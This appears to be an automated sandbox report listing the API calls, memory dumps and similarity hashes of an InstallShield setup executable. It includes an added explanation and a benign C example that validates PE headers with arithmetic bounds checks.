  • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
  • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
  • Part of subcall function 00401410: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0040144B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext$lstrcmpi$AddressCloseDeleteHandleModuleProcValue
• String ID: Delete$ForceRemove$NoRemove$Val
• API String ID: 3600369491-1781481701
• Opcode ID: 26f8775e148079aa73a4a649bd4ce4945ef95314761ed86a9722d58f0ed9fb76
• Instruction ID: 6dc620b225dab416690d1ba2ee3c09ba26d4facdf7f075b6ae9faed6ab9836dc
• Opcode Fuzzy Hash: 26f8775e148079aa73a4a649bd4ce4945ef95314761ed86a9722d58f0ed9fb76
• Instruction Fuzzy Hash: 9FF1E471D01225BADB35EB658D487AEB6B4AF18710F0051AFE805E7291DBB88F84CF58
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
• String ID: HsG$string too long
• API String ID: 4104443479-1276652413
• Opcode ID: 32e3f447df7f510110eb6fa2a6bcadc33ab4fdfe5dda07ae08fa81d5fe72df2b
• Instruction ID: 6ae8a0eb024996b628e4143672ce806468e6e2847a17c5a84c499ac37f0afa9c
• Opcode Fuzzy Hash: 32e3f447df7f510110eb6fa2a6bcadc33ab4fdfe5dda07ae08fa81d5fe72df2b
• Instruction Fuzzy Hash: D8B1AF712087009BD720DF28D884B6BB7F9EF85314F100A2EF99997390D779E904CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00432D20
  • Part of subcall function 00430E88: __EH_prolog3.LIBCMT ref: 00430E8F
  • Part of subcall function 00431BAF: InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,00430DD6,?,?,00000000), ref: 00431BB4
  • Part of subcall function 00431BAF: GetLastError.KERNEL32(?,00430DD6,?,?,00000000), ref: 00431BBE
• GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00432DA2
• GetModuleHandleW.KERNEL32(00000000), ref: 00432DFD
• __EH_prolog3_GS.LIBCMT ref: 00432EF2
• GetModuleHandleW.KERNEL32(00000000,?,?,00000A64), ref: 00432FD5
• GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00432F77
  • Part of subcall function 0043120B: __EH_prolog3.LIBCMT ref: 00431212
  • Part of subcall function 0043120B: EnterCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 0043122A
  • Part of subcall function 0043120B: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00431249
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Module$CriticalSection$FileH_prolog3H_prolog3_HandleName$CountEnterErrorInitializeLastLeaveSpin
• String ID: Module$Module_Raw$REGISTRY
• API String ID: 3285820555-549000027
• Opcode ID: b4654810c804767d57eaf1e49de16700a1fd3f673e0b84728613e4f7dc8649df
• Instruction ID: ca5aa2f9cda23b11924902e025e0776929f6c6c72c98b7f39a012655aa67a053
• Opcode Fuzzy Hash: b4654810c804767d57eaf1e49de16700a1fd3f673e0b84728613e4f7dc8649df
• Instruction Fuzzy Hash: 3FA1C632A002299BDB20DB50CE51BEE7378AF09314F1455DBF909E3151D7B89F44CBAA
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041E5F7
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
  • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 00457832: __EH_prolog3_GS.LIBCMT ref: 0045783C
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• VerLanguageNameW.KERNEL32(?,00000000,00000104,?,00000104,00000000), ref: 0041E925
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$H_prolog3String$Free$AllocLanguageName
                                                                                                                                                                          • String ID: $.ini$0x%04x$0x0409$HsG$HsG$Languages
                                                                                                                                                                          • API String ID: 688613020-3369345278
                                                                                                                                                                          • Opcode ID: 76fd5e54b8e6a84f8170e095a24250969687b9b7881741264278595d774080c2
                                                                                                                                                                          • Instruction ID: e70d1e0cfe5ab156710d98ac732bee141d2c2faacf9419555326adf521d50b6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 76fd5e54b8e6a84f8170e095a24250969687b9b7881741264278595d774080c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 70A1A170D04258EADB10EBA5CC46BEEBBB4AF15304F4440DEE445B71C2DBB94B48DBA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004395F6
  • Part of subcall function 0041F375: __EH_prolog3_GS.LIBCMT ref: 0041F37C
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• GetFileAttributesW.KERNEL32(?), ref: 004396FB
• GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 00439760
• GetTempFileNameW.KERNEL32(?,IS_,00000000,00000000,?,00000104), ref: 004397B5
• GetModuleFileNameW.KERNEL32(?,00000104), ref: 004397D8
  • Part of subcall function 0040F187: SysFreeString.OLEAUT32(00000000), ref: 0040F196
  • Part of subcall function 0043D95F: __EH_prolog3.LIBCMT ref: 0043D966
  • Part of subcall function 0043D95F: CloseHandle.KERNEL32(?,00000008,0043EDE4,?,?,00483E18,?,?,00000000,00000000), ref: 0043D9C3
• DeleteFileW.KERNEL32(?), ref: 0043990C
  • Part of subcall function 00418DB7: __EH_prolog3_GS.LIBCMT ref: 00418DBE
  • Part of subcall function 00418DB7: LoadLibraryW.KERNEL32(?,?,00000001,0000006C,00427B39,?,00000000,?,00000000), ref: 00418DE7
  • Part of subcall function 00418DB7: GetLastError.KERNEL32 ref: 00418DFE
  • Part of subcall function 00419082: __EH_prolog3.LIBCMT ref: 00419089
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$File$FreeH_prolog3_String$H_prolog3NameTemp$AttributesCloseDeleteHandleLibraryLoadModulePath
• String ID: HsG$ISSetup.dll$IS_
• API String ID: 2103059120-3294081037
• Opcode ID: d87e0d1073ffd8b779ad16f26507bf306cf59d8d602ded7ec2c15259f1899ff3
• Instruction ID: d1d4f8ed019ee4de056304f90647de4b0c89f4b291602d0943f11ac2d2dac808
• Opcode Fuzzy Hash: d87e0d1073ffd8b779ad16f26507bf306cf59d8d602ded7ec2c15259f1899ff3
• Instruction Fuzzy Hash: DEA18930904258EFCB25EB64CC99BDDBBB8AB19304F5041EEE009A71A1DB785F88CF55
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041A19E
• GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A1B0
• GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400,?,00000000,Running after reboot,?,00000001,Setup.cpp), ref: 0041A21B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString$AddressFileH_prolog3_ModuleNameProc
• String ID: HsG$HsG$ProductCode$RunISMSISetup$Startup$setup.ini
• API String ID: 585182573-410899784
• Opcode ID: 98784b6183912243f2d9471099c408e7ce55118518920cb007bab6d99c5bdbc1
• Instruction ID: 0957057a987c12b67f723429a7cf051bb6bca496a84ec87bb44cdcf17f9241c1
• Opcode Fuzzy Hash: 98784b6183912243f2d9471099c408e7ce55118518920cb007bab6d99c5bdbc1
• Instruction Fuzzy Hash: 49717E30801258EECB15DBA4CD94BDDBB74AF15308F1440EEE4497B192DBB89F88CB55
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00416E41
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• EndDialog.USER32(?,00000001), ref: 00416E9D
• SetWindowTextW.USER32(?,-00000004), ref: 00416EE3
• GetDlgItem.USER32 ref: 00416F21
• GetDlgItem.USER32 ref: 00416F29
• ShowWindow.USER32(?,00000000), ref: 00416F3F
• ShowWindow.USER32(00000000,00000000), ref: 00416F55
• DeleteObject.GDI32 ref: 00416F78
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Window$ErrorItemLastShow$DeleteDialogH_prolog3_ObjectText
• String ID: HsG
• API String ID: 276247898-1835203436
• Opcode ID: 78859d42d7e7ef9faba6097dc38228c4d6f5e39ec9f943eee3fd1315796edf2d
• Instruction ID: 32a1438aed9bd3f86af79f989fb10cae18025b3ec74c94308b832d7c68902945
• Opcode Fuzzy Hash: 78859d42d7e7ef9faba6097dc38228c4d6f5e39ec9f943eee3fd1315796edf2d
• Instruction Fuzzy Hash: 0C31FD70900204EBDB10EFA4DC89AEE3B78EB14314F52413FF505A72A2DB389949CB2C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012,74B04C30,?,74B04D40,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?,?), ref: 004037B1
• SetLastError.KERNEL32(?,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?,?), ref: 004037E1
• GetLastError.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?,?,?,?,004711E0,000000FF,HsG,0040350D,?), ref: 00403831
• SysFreeString.OLEAUT32(?), ref: 0040384D
• SysFreeString.OLEAUT32(?), ref: 00403858
• SetLastError.KERNEL32(?), ref: 00403878
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: 5@$HsG$HsG
• API String ID: 2425351278-546635779
• Opcode ID: fbafaa1693c874dc00c61cee88e1bbe901b1ae54a5fa353eabf8473e2c0fa7c6
• Instruction ID: 871e10d8fcb673fc33f50acdd71b1ffce2ec75293a1789f6cef84babbc413505
• Opcode Fuzzy Hash: fbafaa1693c874dc00c61cee88e1bbe901b1ae54a5fa353eabf8473e2c0fa7c6
• Instruction Fuzzy Hash: 5B414BB1900609EFDB00DFA5C945B9EBBF4FF08314F10813AE809A7761E779A915CB98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadIconW.USER32(0000000C,InstallShieldMSIDelete10), ref: 0040CBFA
• LoadCursorW.USER32(00000000,00007F00), ref: 0040CC09
• GetStockObject.GDI32(00000004), ref: 0040CC14
• RegisterClassW.USER32 ref: 0040CC2B
• CreateWindowExW.USER32 ref: 0040CC4F
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CC7C
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Load$ClassCreateCursorIconMessageObjectRegisterStockWindow
• String ID: InstallShieldMSIDelete10
• API String ID: 195796534-324135598
• Opcode ID: adb89a01bead356bb743f263100584f80e17619f8ad141a653908dc69371d8b4
• Instruction ID: e61589a4caaa5cfe348c24567c4c13d8ab35480bda4c0a82e888dee5ad5759ef
• Opcode Fuzzy Hash: adb89a01bead356bb743f263100584f80e17619f8ad141a653908dc69371d8b4
• Instruction Fuzzy Hash: D01138F1D00619ABEB109FE5DC88ADF7ABDEB08744F11413AF50AE2240D77898098B68
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ItemMessageSend$DeleteDialogH_prolog3_ObjectTextWindow
• String ID:
• API String ID: 804393631-0
• Opcode ID: a6122b05e47634fdfd8ab8451ec0760bce8ec09106424b8cd9969a751aaebe2b
• Instruction ID: f39924c76f32e81e8879c03e6409568c4da96c8dad0d7c173ab8e69a6c804ee5
• Opcode Fuzzy Hash: a6122b05e47634fdfd8ab8451ec0760bce8ec09106424b8cd9969a751aaebe2b
• Instruction Fuzzy Hash: 5A919CB1601200AFD704DF65EC8AD6BBB7DFF4A305B60007AF5058B261DB769E41CB29
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0043E47E
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000003C,0043E0D3,?,?,00000044,0043EBF5,00000008,00000010,0043D71F), ref: 0043E4AE
• CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0043E4D7
• GetSystemInfo.KERNEL32(000000FF), ref: 0043E4F9
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,?), ref: 0043E50D
• IsBadReadPtr.KERNEL32(?,000000F8), ref: 0043E541
• UnmapViewOfFile.KERNEL32(00000000), ref: 0043E55F
• MapViewOfFile.KERNEL32(00000008,00000004,00000000,00000000,?), ref: 0043E571
• IsBadReadPtr.KERNEL32(?,000000F8), ref: 0043E59F
• GetLastError.KERNEL32 ref: 0043E5F2
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$View$CreateRead$ErrorH_prolog3InfoLastMappingSystemUnmap
• String ID:
• API String ID: 2433704077-0
• Opcode ID: 48295249430b2d81b019a7e284f5c011ea3b1818ef68984c73926e42bdc3f1ba
• Instruction ID: 9f44de6e9c4080a6bd25bec2e2117addd485c63f55dda09374f6778c30417793
• Opcode Fuzzy Hash: 48295249430b2d81b019a7e284f5c011ea3b1818ef68984c73926e42bdc3f1ba
• Instruction Fuzzy Hash: 80517170901215EFDB21DFA5CC85BAFBBB4BF08709F50412AE501A72D1E7B89E41CB99
Uniqueness
• Uniqueness Score: -1.00%
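
The call sequence listed for the function at 0043E47E is the shape of a PE header probe: CreateFileW with GENERIC_READ (80000000), FILE_SHARE_READ (1), OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (80), CreateFileMappingW with PAGE_READONLY (2), MapViewOfFile with FILE_MAP_READ (4), then IsBadReadPtr with length 0xF8, which is sizeof(IMAGE_NT_HEADERS32) (4-byte signature + 20-byte file header + 224-byte PE32 optional header). The report shows the probed pointer only as "?"; that it is base + e_lfanew is an assumption. The portable C below is an added example written for this report, not code recovered from the sample: it performs the same header validation over a byte buffer (on Windows the buffer would be the mapped view), replacing IsBadReadPtr with an arithmetic bounds check against the known mapping size, and builds a constructed minimal PE32 image to exercise the in-bounds and truncated cases.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed sizes from the PE file format. 0xF8 is the length the listed
 * function passes to IsBadReadPtr: sizeof(IMAGE_NT_HEADERS32) =
 * Signature (4) + IMAGE_FILE_HEADER (20) + IMAGE_OPTIONAL_HEADER32 (224). */
#define DOS_HEADER_SIZE      0x40u
#define DOS_E_LFANEW_OFFSET  0x3Cu
#define NT_HEADERS32_SIZE    0xF8u
#define FILE_HEADER_SIZE     20u
#define PE32_MAGIC           0x10Bu
#define PE32PLUS_MAGIC       0x20Bu

enum pe_status {
    PE_OK = 0,
    PE_TOO_SHORT,          /* buffer cannot hold an IMAGE_DOS_HEADER */
    PE_BAD_MZ,             /* no "MZ" signature */
    PE_NT_OUT_OF_BOUNDS,   /* e_lfanew + 0xF8 exceeds the mapped size */
    PE_BAD_PE_SIG,         /* no "PE\0\0" at e_lfanew */
    PE_BAD_MAGIC           /* optional header is neither PE32 nor PE32+ */
};

struct pe_info {
    uint32_t e_lfanew;
    uint16_t machine;
    uint16_t number_of_sections;
    uint16_t optional_magic;
};

/* Little-endian field readers: the image is treated as bytes, not as a
 * struct, so host endianness and struct padding cannot skew the offsets. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate the headers of a PE image held in buf[0..len). The bounds
 * check is the arithmetic equivalent of IsBadReadPtr(base + e_lfanew, 0xF8)
 * against a mapping whose size is known. */
enum pe_status pe_probe(const uint8_t *buf, size_t len, struct pe_info *out)
{
    if (len < DOS_HEADER_SIZE) return PE_TOO_SHORT;
    if (buf[0] != 'M' || buf[1] != 'Z') return PE_BAD_MZ;

    uint32_t e_lfanew = rd32(buf + DOS_E_LFANEW_OFFSET);
    /* Test e_lfanew before subtracting so a huge value cannot wrap. */
    if (e_lfanew > len || len - e_lfanew < NT_HEADERS32_SIZE)
        return PE_NT_OUT_OF_BOUNDS;

    const uint8_t *nt = buf + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return PE_BAD_PE_SIG;

    const uint8_t *fh = nt + 4;                 /* IMAGE_FILE_HEADER */
    const uint8_t *oh = fh + FILE_HEADER_SIZE;  /* IMAGE_OPTIONAL_HEADER */
    uint16_t magic = rd16(oh);
    if (magic != PE32_MAGIC && magic != PE32PLUS_MAGIC) return PE_BAD_MAGIC;

    if (out) {
        out->e_lfanew = e_lfanew;
        out->machine = rd16(fh);
        out->number_of_sections = rd16(fh + 2);
        out->optional_magic = magic;
    }
    return PE_OK;
}

/* Constructed test input, not taken from the sample: a minimal PE32 header
 * with e_lfanew = 0x80, Machine = 0x014C (i386) and one section. Returns
 * the number of bytes written, 0x80 + 0xF8 = 376. */
size_t build_minimal_pe32(uint8_t *buf, size_t cap)
{
    const uint32_t e_lfanew = 0x80;
    size_t total = e_lfanew + NT_HEADERS32_SIZE;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[DOS_E_LFANEW_OFFSET] = (uint8_t)e_lfanew;       /* upper 3 bytes stay 0 */
    memcpy(buf + e_lfanew, "PE\0\0", 4);
    buf[e_lfanew + 4] = 0x4C; buf[e_lfanew + 5] = 0x01;  /* Machine = 0x014C */
    buf[e_lfanew + 6] = 1;                               /* NumberOfSections */
    buf[e_lfanew + 4 + FILE_HEADER_SIZE] = 0x0B;         /* Magic = 0x010B */
    buf[e_lfanew + 4 + FILE_HEADER_SIZE + 1] = 0x01;
    return total;
}

int main(void)
{
    uint8_t img[512];
    size_t n = build_minimal_pe32(img, sizeof img);
    struct pe_info info;
    enum pe_status st = pe_probe(img, n, &info);
    printf("full image: status=%d machine=0x%04X sections=%u magic=0x%X\n",
           st, info.machine, info.number_of_sections, info.optional_magic);
    /* A mapping cut off inside the NT headers: the case the 0xF8 probe exists for. */
    st = pe_probe(img, 0x80 + 0x10, NULL);
    printf("truncated image: status=%d\n", st);
    return 0;
}
```

Microsoft documents IsBadReadPtr as obsolete: it can swallow access violations that belong to other code (guard pages, stack probes) and it races with concurrent unmapping, so a parser that knows the view size should bound-check e_lfanew arithmetically as above rather than probe the pointer. The sample's use of it is therefore worth noting when classifying the routine but is not a reliable guard.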

APIs
• __EH_prolog3_GS.LIBCMT ref: 00415806
  • Part of subcall function 00415AB7: lstrlenW.KERNEL32(?), ref: 00415AC2
• CopyFileW.KERNEL32(?,?,00000000,00000830,0042203B,?,?), ref: 00415821
• _memset.LIBCMT ref: 00415842
• CreateThread.KERNEL32 ref: 004158D5
• MsgWaitForMultipleObjects.USER32 ref: 00415900
• PeekMessageW.USER32 ref: 00415947
• MsgWaitForMultipleObjects.USER32 ref: 0041595C
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MultipleObjectsWait$CopyCreateFileH_prolog3_MessagePeekThread_memsetlstrlen
• String ID:
• API String ID: 4111908098-0
• Opcode ID: 65d4c742271cfd3dc60a1702bf0ae3f07c17ee62d2d954eee1c27a6055a356be
• Instruction ID: 98610f40a411d0467980053612d0a366f5854de4d7ed70487b933b1cee140c02
• Opcode Fuzzy Hash: 65d4c742271cfd3dc60a1702bf0ae3f07c17ee62d2d954eee1c27a6055a356be
• Instruction Fuzzy Hash: C041D3B1900614EBDB20AF708C45BEE76BDBF84724F00816AB559A7291DF784E818B98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040D7D1
  • Part of subcall function 00419A17: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000,?,00000008,00000000,?,0040D7F7,000000FF,?), ref: 00419A3A
  • Part of subcall function 00419AD9: GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
  • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
  • Part of subcall function 00419AD9: HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
  • Part of subcall function 00419AD9: ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
  • Part of subcall function 00419AD9: _strlen.LIBCMT ref: 00419B47
  • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
  • Part of subcall function 00419AD9: HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Heap$File$Process$AllocCreateFreeH_prolog3_ReadSize_strlen
• String ID: $$jG$,jG$@jG$DjG$HjG$LjG
• API String ID: 3764712436-1056898129
